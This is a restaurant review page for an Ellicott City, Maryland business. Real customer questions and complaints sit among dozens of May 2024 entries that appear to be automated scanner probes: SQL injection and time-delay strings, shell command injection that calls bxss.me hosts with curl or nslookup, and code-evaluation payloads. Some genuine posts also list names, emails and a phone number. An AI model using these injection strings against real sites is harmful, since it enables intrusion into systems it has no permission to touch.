5725 Richards Valley Rd, Ellicott City, MD, 21043 

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Chinesemenu.com's Ratings & Reviews will let you know if it's worth your time or not in over 75 cities.


Reviewed by: dkisloski on: 2024/12/16 7:42:28
Are you open Christmas Day 2024?
Reviewed by: testing on: 2024/5/5 5:06:39
Reviewed by:  on: 2024/5/5 4:19:19
Reviewed by: testing on: 2024/5/5 4:18:46
Reviewed by: testing on: 2024/5/5 4:18:32
Reviewed by: -1" or 2+125-125-1=0+0+0+1 --  on: 2024/5/5 4:18:24
Reviewed by: -1' or 2+121-121-1=0+0+0+1 or 'aqzyipau'=' on: 2024/5/5 4:18:17
Reviewed by: -1' or 2+656-656-1=0+0+0+1 --  on: 2024/5/5 4:17:59
Reviewed by: -1 or 2+496-496-1=0+0+0+1 on: 2024/5/5 4:17:44
Reviewed by: -1 or 2+865-865-1=0+0+0+1 --  on: 2024/5/5 4:17:32
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Reviewed by: testing on: 2024/5/5 4:09:46
Reviewed by: testing on: 2024/5/5 4:09:30
-1" OR 2+980-980-1=0+0+0+1 --
Reviewed by: testing on: 2024/5/5 4:09:11
-1' OR 2+742-742-1=0+0+0+1 or 'UBA7PUtF'='
Reviewed by: testing on: 2024/5/5 4:08:51
-1' OR 2+586-586-1=0+0+0+1 --
Reviewed by: testing on: 2024/5/5 4:08:32
-1 OR 2+469-469-1=0+0+0+1
Reviewed by: testing on: 2024/5/5 4:08:23
-1 OR 2+316-316-1=0+0+0+1 --
Reviewed by: testing on: 2024/5/5 4:08:05
Reviewed by: testing on: 2024/5/5 4:06:41
Reviewed by: testing on: 2024/5/5 4:05:30
Reviewed by: testing on: 2024/5/5 4:04:54
;(nslookup -q=cname hitgvyzniuvukf9541.bxss.me||curl hitgvyzniuvukf9541.bxss.me)|(nslookup -q=cname hitgvyzniuvukf9541.bxss.me||curl hitgvyzniuvukf9541.bxss.me)&(nslookup -q=cname hitgvyzniuvukf9541.bxss.me||curl hitgvyzniuvukf9541.bxss.me)
Reviewed by: testing on: 2024/5/5 4:04:44
`(nslookup -q=cname hitefvadsitztd44a6.bxss.me||curl hitefvadsitztd44a6.bxss.me)`
Reviewed by: testing on: 2024/5/5 4:04:41
Reviewed by: testing on: 2024/5/5 4:04:37
|(nslookup -q=cname hitulxeilxvbyeeb95.bxss.me||curl hitulxeilxvbyeeb95.bxss.me)
Reviewed by: testing on: 2024/5/5 4:04:29
&(nslookup -q=cname hitcnaqgurnjy22aa0.bxss.me||curl hitcnaqgurnjy22aa0.bxss.me)&'\"`0&(nslookup -q=cname hitcnaqgurnjy22aa0.bxss.me||curl hitcnaqgurnjy22aa0.bxss.me)&`'
Reviewed by: testing on: 2024/5/5 4:04:20
&nslookup -q=cname hitpctysadstq663ca.bxss.me&'\"`0&nslookup -q=cname hitpctysadstq663ca.bxss.me&`'
Reviewed by: '.print(md5(31337)).' on: 2024/5/5 4:04:19
Reviewed by: testing on: 2024/5/5 4:04:11
$(nslookup -q=cname hitshfyggetcge4d58.bxss.me||curl hitshfyggetcge4d58.bxss.me)
Reviewed by: ${ on: 2024/5/5 4:04:10
Reviewed by: testing on: 2024/5/5 4:03:52
(nslookup -q=cname hitsokuicriak77976.bxss.me||curl hitsokuicriak77976.bxss.me))
Reviewed by: ${ on: 2024/5/5 4:03:50
Reviewed by: testing on: 2024/5/5 4:03:38
1|echo aecmau$()\ pzgxpn\nz^xyu||a #' |echo aecmau$()\ pzgxpn\nz^xyu||a #|" |echo aecmau$()\ pzgxpn\nz^xyu||a #
Reviewed by: ";print(md5(31337));$a=" on: 2024/5/5 4:03:33
Reviewed by: testing on: 2024/5/5 4:03:25
|echo zazuvj$()\ jqwjzz\nz^xyu||a #' |echo zazuvj$()\ jqwjzz\nz^xyu||a #|" |echo zazuvj$()\ jqwjzz\nz^xyu||a #
Reviewed by: ';print(md5(31337));$a=' on: 2024/5/5 4:03:22
Reviewed by: testing on: 2024/5/5 4:03:01
1&echo fgqevu$()\ ikjzey\nz^xyu||a #' &echo fgqevu$()\ ikjzey\nz^xyu||a #|" &echo fgqevu$()\ ikjzey\nz^xyu||a #
Reviewed by: testing on: 2024/5/5 4:02:48
&echo xmgaet$()\ ckxasi\nz^xyu||a #' &echo xmgaet$()\ ckxasi\nz^xyu||a #|" &echo xmgaet$()\ ckxasi\nz^xyu||a #
Reviewed by: testing on: 2024/5/5 4:02:42
Reviewed by: testing on: 2024/5/5 4:02:31
echo hbmrhl$()\ nzukog\nz^xyu||a #' &echo hbmrhl$()\ nzukog\nz^xyu||a #|" &echo hbmrhl$()\ nzukog\nz^xyu||a #
Reviewed by: testing on: 2024/5/5 4:02:29
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Reviewed by: testing on: 2024/5/5 4:01:41
Reviewed by: testing on: 2024/5/5 4:01:21
Reviewed by: "+response.write(9929953*9438746)+" on: 2024/5/5 4:01:16
Reviewed by: '+response.write(9929953*9438746)+' on: 2024/5/5 4:01:06
Reviewed by: response.write(9929953*9438746) on: 2024/5/5 4:00:57
Reviewed by: testing on: 2024/5/5 4:00:47
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Reviewed by: testing on: 2024/5/5 4:00:29
Reviewed by: testing on: 2024/5/5 4:00:25
Reviewed by: testing on: 2024/5/5 4:00:18
'+'A'.concat(70-3).concat(22*4).concat(104).concat(73).concat(113).concat(66)+(require'socket' Socket.gethostbyname('hitzg'+'rdvjleev56c3d.bxss.me.')[3].to_s)+'
Reviewed by: testing on: 2024/5/5 4:00:06
Reviewed by: testing on: 2024/5/5 4:00:04
Reviewed by: testing on: 2024/5/5 3:59:46
"+"A".concat(70-3).concat(22*4).concat(120).concat(67).concat(97).concat(75)+(require"socket" Socket.gethostbyname("hityr"+"lkdfrlhte7f1b.bxss.me.")[3].to_s)+"
Reviewed by: testing on: 2024/5/5 3:59:38
Reviewed by: testing on: 2024/5/5 3:57:25
Reviewed by: testing on: 2024/5/4 9:59:06
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Reviewed by: testing on: 2024/5/4 9:43:29
Reviewed by: testing on: 2024/5/4 9:43:28
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Reviewed by: testing on: 2024/5/4 9:43:24
Reviewed by: testing on: 2024/5/4 9:43:23
Reviewed by: if(now()=sysdate(),sleep(15),0) on: 2024/5/4 9:43:21
Reviewed by: -1" or 2+531-531-1=0+0+0+1 --  on: 2024/5/4 9:43:19
Reviewed by: -1' or 2+100-100-1=0+0+0+1 or 'pmnf9ojq'=' on: 2024/5/4 9:43:17
Reviewed by: -1' or 2+981-981-1=0+0+0+1 --  on: 2024/5/4 9:43:17
Reviewed by: -1 or 2+681-681-1=0+0+0+1 on: 2024/5/4 9:43:16
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Reviewed by: testing on: 2024/5/4 9:43:15
Reviewed by: testing on: 2024/5/4 9:43:15
Reviewed by: testing on: 2024/5/4 9:43:14
Reviewed by: testing on: 2024/5/4 9:43:14
Reviewed by: testing on: 2024/5/4 9:43:14
Reviewed by: testing on: 2024/5/4 9:43:13
Reviewed by: testing on: 2024/5/4 9:43:13
Reviewed by: testing on: 2024/5/4 9:43:12
Reviewed by: testing on: 2024/5/4 9:43:12
1cYVJQ6P6')) OR 42=(SELECT 42 FROM PG_SLEEP(15))--
Reviewed by: testing on: 2024/5/4 9:43:11
1qnemhoOH') OR 664=(SELECT 664 FROM PG_SLEEP(15))--
Reviewed by: testing on: 2024/5/4 9:43:10
Reviewed by: testing on: 2024/5/4 9:43:09
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Reviewed by: testing on: 2024/5/4 9:43:08
1-1) OR 91=(SELECT 91 FROM PG_SLEEP(15))--
Reviewed by: testing on: 2024/5/4 9:43:05
1-1 OR 240=(SELECT 240 FROM PG_SLEEP(15))--
Reviewed by: testing on: 2024/5/4 9:43:04
1EEJEHZ95')); waitfor delay '0:0:15' --
Reviewed by: testing on: 2024/5/4 9:43:03
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Reviewed by: testing on: 2024/5/4 9:43:02
1MrHeAInP'; waitfor delay '0:0:15' --
Reviewed by: testing on: 2024/5/4 9:43:00
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Reviewed by: testing on: 2024/5/4 9:42:58
1-1)); waitfor delay '0:0:15' --
Reviewed by: testing on: 2024/5/4 9:42:57
1-1); waitfor delay '0:0:15' --
Reviewed by: testing on: 2024/5/4 9:42:56
1-1; waitfor delay '0:0:15' --
Reviewed by: testing on: 2024/5/4 9:42:54
Reviewed by: testing on: 2024/5/4 9:42:53
Reviewed by: testing on: 2024/5/4 9:42:51
Reviewed by: testing on: 2024/5/4 9:42:48
Reviewed by: testing on: 2024/5/4 9:42:47
-1" OR 2+66-66-1=0+0+0+1 --
Reviewed by: testing on: 2024/5/4 9:42:47
-1' OR 2+64-64-1=0+0+0+1 or 'CuEuhZ05'='
Reviewed by: testing on: 2024/5/4 9:42:46
-1' OR 2+610-610-1=0+0+0+1 --
Reviewed by: testing on: 2024/5/4 9:42:45
-1 OR 2+549-549-1=0+0+0+1
Reviewed by: testing on: 2024/5/4 9:42:45
-1 OR 2+71-71-1=0+0+0+1 --
Reviewed by: testing on: 2024/5/4 9:42:44
Reviewed by: testing on: 2024/5/4 9:42:42
Reviewed by: testing on: 2024/5/4 9:42:40
Reviewed by: testing on: 2024/5/4 9:42:39
Reviewed by: '.print(md5(31337)).' on: 2024/5/4 9:42:17
Reviewed by: ${ on: 2024/5/4 9:42:16
Reviewed by: ${ on: 2024/5/4 9:42:14
Reviewed by: testing on: 2024/5/4 9:42:14
;(nslookup -q=cname hitiiqoldzkil97bbd.bxss.me||curl hitiiqoldzkil97bbd.bxss.me)|(nslookup -q=cname hitiiqoldzkil97bbd.bxss.me||curl hitiiqoldzkil97bbd.bxss.me)&(nslookup -q=cname hitiiqoldzkil97bbd.bxss.me||curl hitiiqoldzkil97bbd.bxss.me)
Reviewed by: ";print(md5(31337));$a=" on: 2024/5/4 9:42:13
Reviewed by: testing on: 2024/5/4 9:42:13
`(nslookup -q=cname hitrpccchiqyje9db5.bxss.me||curl hitrpccchiqyje9db5.bxss.me)`
Reviewed by: ';print(md5(31337));$a=' on: 2024/5/4 9:42:13
Reviewed by: testing on: 2024/5/4 9:42:13
|(nslookup -q=cname hitfofoioysaxa3b4a.bxss.me||curl hitfofoioysaxa3b4a.bxss.me)
Reviewed by: testing on: 2024/5/4 9:42:12
&(nslookup -q=cname hitkycbhbqpba772ca.bxss.me||curl hitkycbhbqpba772ca.bxss.me)&'\"`0&(nslookup -q=cname hitkycbhbqpba772ca.bxss.me||curl hitkycbhbqpba772ca.bxss.me)&`'
Reviewed by: testing on: 2024/5/4 9:42:10
Reviewed by: testing on: 2024/5/4 9:42:10
&nslookup -q=cname hitfwjipljspw4c891.bxss.me&'\"`0&nslookup -q=cname hitfwjipljspw4c891.bxss.me&`'
Reviewed by: testing on: 2024/5/4 9:42:10
Reviewed by: testing on: 2024/5/4 9:42:10
$(nslookup -q=cname hitzcweyvkcbae1ce3.bxss.me||curl hitzcweyvkcbae1ce3.bxss.me)
Reviewed by: testing on: 2024/5/4 9:42:09
Reviewed by: testing on: 2024/5/4 9:42:09
(nslookup -q=cname hitwodrnnbbhq5fd93.bxss.me||curl hitwodrnnbbhq5fd93.bxss.me))
Reviewed by: testing on: 2024/5/4 9:42:09
Reviewed by: testing on: 2024/5/4 9:42:08
1|echo mmxapf$()\ krtdwt\nz^xyu||a #' |echo mmxapf$()\ krtdwt\nz^xyu||a #|" |echo mmxapf$()\ krtdwt\nz^xyu||a #
Reviewed by: testing on: 2024/5/4 9:42:08
Reviewed by: testing on: 2024/5/4 9:42:08
|echo hfrjuc$()\ zjhpor\nz^xyu||a #' |echo hfrjuc$()\ zjhpor\nz^xyu||a #|" |echo hfrjuc$()\ zjhpor\nz^xyu||a #
Reviewed by: testing on: 2024/5/4 9:42:07
Reviewed by: testing on: 2024/5/4 9:42:06
1&echo fzpabb$()\ kqjqkn\nz^xyu||a #' &echo fzpabb$()\ kqjqkn\nz^xyu||a #|" &echo fzpabb$()\ kqjqkn\nz^xyu||a #
Reviewed by: testing on: 2024/5/4 9:42:05
&echo hbpwrd$()\ lrjpwo\nz^xyu||a #' &echo hbpwrd$()\ lrjpwo\nz^xyu||a #|" &echo hbpwrd$()\ lrjpwo\nz^xyu||a #
Reviewed by: testing on: 2024/5/4 9:42:05
echo btkesc$()\ wobduq\nz^xyu||a #' &echo btkesc$()\ wobduq\nz^xyu||a #|" &echo btkesc$()\ wobduq\nz^xyu||a #
Reviewed by: testing on: 2024/5/4 9:42:03
Reviewed by: testing on: 2024/5/4 9:42:03
Reviewed by: testing on: 2024/5/4 9:42:03
Reviewed by: "+response.write(9856721*9988481)+" on: 2024/5/4 9:42:02
Reviewed by: '+response.write(9856721*9988481)+' on: 2024/5/4 9:42:02
Reviewed by: response.write(9856721*9988481) on: 2024/5/4 9:42:02
Reviewed by: testing on: 2024/5/4 9:42:01
Reviewed by: testing on: 2024/5/4 9:42:01
Reviewed by: testing on: 2024/5/4 9:42:00
Reviewed by: testing on: 2024/5/4 9:41:59
Reviewed by: testing on: 2024/5/4 9:41:58
'+'A'.concat(70-3).concat(22*4).concat(111).concat(78).concat(112).concat(87)+(require'socket' Socket.gethostbyname('hitst'+'kxagtuqsc27ca.bxss.me.')[3].to_s)+'
Reviewed by: testing on: 2024/5/4 9:41:57
"+"A".concat(70-3).concat(22*4).concat(102).concat(86).concat(105).concat(81)+(require"socket" Socket.gethostbyname("hitoy"+"jzqcdaeib2f6f.bxss.me.")[3].to_s)+"
Reviewed by: testing on: 2024/5/4 9:41:57
Reviewed by: testing on: 2024/5/4 9:41:28
Reviewed by: jstephencowles on: 2023/5/3 6:23:02
On your website, you may want to put the "open hours" in white or yellow type as the black is difficult for many to read on the dark background.
Reviewed by: scarletpgcsd on: 2022/12/10 16:59:38
Do you sell gift cards?
Reviewed by: tranderson12 on: 2022/9/17 9:11:10
Do you have a Happy Hour, & what are the times & prices? The Glen Burnie location has $1.50 beer specials during Happy Hour, but your location is closer for me. Thank you.
Reviewed by: jbayiates on: 2022/7/27 5:23:43
Would it be possible to get the itemized receipt of the following checks for a work expense reimbursement? 06/30/2022 AMEX 1000 Track No.198080 $46.41 06/29/2022 AMEX 1000 Track No.197968 $59.13 If so, please email to jbayiates@neiep.org. Thank you.
Reviewed by: always_a_slate on: 2022/5/1 11:14:25
Do you take reservations
Reviewed by: Anonymous on: 2021/7/13 11:41:44
Reviewed by: Anonymous on: 2021/7/13 11:31:22
Reviewed by: dsmeacham on: 2021/7/13 11:31:22
please add me to your mailing list. David Meacham dsmeacham@gmail.com 443-326-5419
Reviewed by: dcomulada on: 2021/3/24 15:14:09
Would like to purchase a gift card for our niece (Skylar Gouin) who lives in Ellicott City, MD. How do we order this on-line?
Reviewed by: grannyvibe on: 2021/3/14 16:24:25
The in-house experience is very different than the pick up. I’ve ordered pick up on three occasions and it’s pricey and taste bad. The chicken and salmon have been dry and tasteless. The last order was $136 for chicken with brocolli and salmon, 2 of each with cheese cake. The cheese cake was frozen and I gave the food away. I could not stomach eating it. The order prior to that was fir a birthday event. It was missing items requested. Whenever, I dine inside, the food tastes totally different for the same dish. Please fix this problem.
Reviewed by: leomark11117 on: 2020/10/13 15:40:00
Hello, Trust you are well. I work for a small health volunteer group. I will like to know if I can place a food order for pick up towards the end of the month. The order is to cater to some health volunteer workers (Heritage Giving)fighting against the dreadful outbreak of the COVID19. Can you get me the total cost for 140 chicken caesar salads individually packed ? I'm working with an Event Planner Driver AND We have made arrangement for a driver to pick up the order after payment on the stated date. Thanks in anticipation of a positive response. Best Regards, Leomark Leomark11117@Gmail.Com
Reviewed by: cmc3kidz on: 2020/9/7 11:04:07
I ordered drunken noodle WITH CHICKEN. Meanwhile on the menu It says it comes with basil leaves, bean sprouts and red onion. I asked that they add peppers and tomatoes. My order arrived promptly through Grubhub. When I began eating, I noticed there was ZERO chicken. I called the restaurant and explained the Situation . They blamed grubhub! I said grubhub does not make the order, they simply deliver it. The guy at the restaurant was adamant and refused to credit me the cost of the chicken... somewhere between $2-3. I will NEVER order from them again!! How the hell are you going to blame a third party driver? Dumbass!
Reviewed by: tferna4 on: 2020/8/27 5:00:41
I had a problem while ordering on the app. I did not put any special instructions when ordering the spicy tuna, salmon or yellow tail hand roll. A woman called asking about something about the online order. She made no sense so I just said yes. When I picked up the order it was one missing sauce for krab Rangoon and the sushi was just a big ball of I have no clue. We asked for two sweet and sour sauces when we went back and she only gave us one. It was not just normal cut up sushi wrapped in rice. She would not take it back and get it fixed. Highly disappointed. The fried rice tasted horrible and the Alaska sushi that was surprisingly made right, did not taste pleasing as well. Overall, it was a waste of $50. Overpriced and terrible customer service. Just make what was ordered and not something else. You lost business from us.
Reviewed by: spamdemonium on: 2020/1/8 1:44:35
I got the Royal Chicken on monday night 1/6/2020. It didn't have asparagus or red peppers.
Reviewed by: registerns1 on: 2019/12/31 14:57:02
Ordered for pickup and while the food was delicious my main dish had pieces of clear hard plastic throughout it. Very unpleasant.
Reviewed by: josephdupuis on: 2019/12/13 15:38:28
The last two times I've gotten Broccoli Beef, which is my normal meal, it's been awful. The sauce is slimy and congealed and the taste has been odd. I took a few bites of the meal I bought tonight but couldn't stomach it and had to throw it away. I love the restaurant and the food but these last two times were beyond disappointing.
Reviewed by: sbeltermann on: 2019/11/5 18:57:30
Website states open u til 10 pm. Placed online order and paid with MasterCard. Received confirmation. Drove to pick up and place completely dark and closed. It was 945. Seriously! I will be contacting you tomorrow 11/6 to obtain a refund of my money. Not a way to do business.
Reviewed by: perrira on: 2019/11/4 12:34:01
Do you use msg in your food or sauces thank you Judy
Reviewed by: john on: 2019/10/10 9:18:25
I’m reaching out to you because I'm interested in franchising your business and I would like to speak with you. If you are interested in growing the business to more locations through franchising, please feel free to call me directly or to book the best date and time for yourself simply visit my live calendar link here for booking> www.calendly.com/johnromney/introductory-call
Reviewed by: mtyler on: 2019/10/2 9:02:08
Tried to order your sushi special via UberEats the 3 sushi roll special. I wanted 3 of the same roll but you are unable to choose 3 of the same. You may want to visit that option as it may be costing you business.
Reviewed by: gsoriano3 on: 2019/9/12 10:15:55
We had dinner at your restaurant last night. We were served a small salad as soon as we sat down. However, due to food allergies I think you need to disclose to your customers being served that salad that there is peanuts in the dressing. My son has a nut allergy, ate the salad (not thinking there would be nuts in the dressing) then proceeded to have an allergic reaction. A little heads up is all it takes. Please consider letting your customers know this as there are so many allergies these days.
Reviewed by: junkybunky on: 2019/7/21 7:36:05
Food was not pleasing at all. spring rolls tasted like mushy paste, chicken pad Thai was not good, chicken was supposed to be white meat and tasted artificial very thin meatless taste and sauce was too thin and spices were not good at all. Orange chicken was breaded white meat with a very sweet sauce that had not much flavor or spice to taste. I asked for no MSG on my foods. If there was no MSG, it’s hard to tell because the food made my stomach hurt after I got home. I was in the bathroom all night. It’s not a very good Asian restaurant. Also the waitress seemed a little unfriendly. I will never go here again. 2 star at the max. ??
Reviewed by: lhscheer21784 on: 2019/6/26 7:37:18
Hi, Our non-profit 501(3)(c) youth organization (Liberty High School Cheer Team FEIN 52-60009111) is hosting a bingo fundraiser on 9/7/2019 to raise funds to help defray the cost of the 2019 season and to help with hardship cases. We were wondering if you might be able to donate a gift card for our raffle? Any donation would be greatly appreciated. Thank you for your consideration and I look forward to hearing from you soon. Sincerely, Linda Burke LHS Cheer c/o Linda Burke 7311 Falling Leaves Court Marriottsville, MD. 21104